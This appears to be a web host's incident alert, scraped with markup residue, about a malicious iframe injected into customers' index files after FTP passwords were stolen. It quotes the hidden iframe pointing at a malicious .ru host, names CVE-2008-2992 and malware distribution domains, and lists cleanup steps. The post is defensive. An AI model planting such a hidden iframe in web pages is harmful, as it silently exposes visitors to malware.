Last 2 weeks i got 2 issue regarding this matters.<\/p>\n
[b]The scenario:[\/b]<\/p>\n
All index* was edited and redirect to malicious web using iframe.<\/p>\n
Example:<\/p>\n
[quote]iframe src=”http:\/\/u9k.ru:8080\/index.php” width=151 height=125 style=”visibility: hidden”><\/iframe[\/quote]\n\n\n[b]After investigation:[\/b]\n\n1. File owner is current users not nobody or others.\n2. Files uploaded by the users with right access authentication.\n3. All index* was edited in the users www\n4. Only current users infected.\n\n\n[b]How:[\/b]\n\nThe FTP passwd was hacked.\n\nThere are 2 reason how the passwd was hacked.\n\n1. Adobe Acrobat Vulnerability\n\n[quote]\nI checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: \u00e2\u20ac\u0153Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument\u00e2\u20ac\u0153.\n\nIf you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.\n\nThis PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151). \n\nquote from - http:\/\/blog.unmaskparasites.com\/2009\/04\/15\/malicious-income-iframes-from-cn-domains\/ \n[\/quote]\n\n2. FileZilla Vulnerability.\n\n\n[b]\nHow to clean up :[\/b]\n\n1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.\n2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)\n3. Now keep the new passwords secure. Don\u00e2\u20ac\u2122t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use [url=http:\/\/en.wikipedia.org\/wiki\/SFTP]SFTP[\/url] instead of FTP if possible.\n4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.\n5. Scan your server directories for any new\/suspicious files (don\u00e2\u20ac\u2122t forget to check hidden files). Remove anything that should not be there.\n6. If your site was flagged by Google, request a malware review via [url=http:\/\/www.google.com\/webmasters\/tools\/]Webmaster Tools[\/url].\n7. Regularly check your site with diagnostics tools of your choice (my [url=http:\/\/www.unmaskparasites.com\/]Unmask Parasites[\/url] can be one of them) to be sure your site is clean.\n8. Regularly update third party software in your PC.\n\n\n\n<\/p>\n","protected":false},"excerpt":{"rendered":"
Last 2 weeks i got 2 issue regarding this matters. [b]The scenario:[\/b] All index* was edited and redirect to malicious … More Cyberiahosting Users – ALERT – Malicious IFrame hack<\/span>